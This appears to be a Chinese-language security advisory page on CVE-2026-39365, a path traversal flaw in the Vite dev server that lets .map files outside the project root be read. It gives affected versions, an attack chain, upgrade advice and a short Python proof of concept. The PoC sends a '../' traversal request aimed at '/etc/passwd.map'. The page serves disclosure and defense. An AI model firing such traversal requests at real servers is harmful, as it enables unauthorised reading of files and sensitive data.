CVE-2026-39365 CVSS 5.3 中危

CVE-2026-39365 Vite开发服务器路径穿越漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39365

漏洞类型

路径穿越

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Vite

漏洞概述

Vite是一个下一代前端开发与构建工具。在6.0.0至6.4.2之前、7.3.2之前及8.0.5之前的版本中，其开发服务器存在路径穿越漏洞。该漏洞源于服务器在处理.map请求时，未能正确限制URL中的“../”片段。攻击者可利用此缺陷绕过server.fs.strict安全限制，读取项目根目录之外的.map文件，前提是这些文件需符合有效的source map JSON格式。此问题可能导致敏感信息泄露。

技术细节

该漏洞发生在Vite开发服务器处理优化依赖项的.map文件请求过程中。当服务器接收到请求时，它会解析文件路径并调用文件系统API读取文件。由于代码逻辑未对路径中的“../”序列进行严格的规范化处理或校验，攻击者能够构造包含路径遍历字符的恶意URL。尽管Vite通常配置了server.fs.strict来限制文件访问范围，但该机制在此场景下被绕过。攻击者利用此漏洞，可以访问并读取位于项目根目录之外的.map文件（如系统其他位置的构建产物）。由于读取的文件必须符合source map JSON规范，利用条件受到一定限制，但仍存在信息泄露风险。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标正在运行受影响版本的Vite开发服务器。

STEP 2

2. 构造恶意请求

攻击者构造包含“../”序列的HTTP GET请求，指向项目根目录之外的.map文件路径。

STEP 3

3. 绕过安全限制

Vite服务器解析路径时未清洗“../”片段，导致绕过server.fs.strict限制，调用readFile读取外部文件。

STEP 4

4. 获取敏感数据

服务器返回请求的.map文件内容（如果格式正确），攻击者利用其中的信息进行进一步分析。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-39365
# This script attempts to bypass server.fs.strict to read external .map files
import requests

def check_vulnerability(base_url):
    # Path traversal payload attempting to access a file outside the root
    # Adjust the payload path based on the target environment
    payload = "/node_modules/.vite/deps/../../../etc/passwd.map" # Example hypothetical path
    # Or targeting a specific valid map file outside root
    target = base_url + payload
    
    print(f"[+] Testing: {target}")
    try:
        response = requests.get(target, timeout=5)
        if response.status_code == 200 and "version" in response.text:
            print("[!] Vulnerability confirmed! Source map retrieved.")
            print(response.text[:200])
        else:
            print(f"[-] Status: {response.status_code}")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    # Replace with actual dev server URL
    check_vulnerability("http://localhost:5173")

影响范围

Vite >= 6.0.0, < 6.4.2

Vite >= 7.0.0, < 7.3.2

Vite >= 8.0.0, < 8.0.5

防御指南

临时缓解措施

建议立即将Vite升级至修复版本。在升级之前，请确保开发服务器仅监听本地回环地址（127.0.0.1），不要将其部署在互联网或不可信网络环境中，以降低被攻击的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表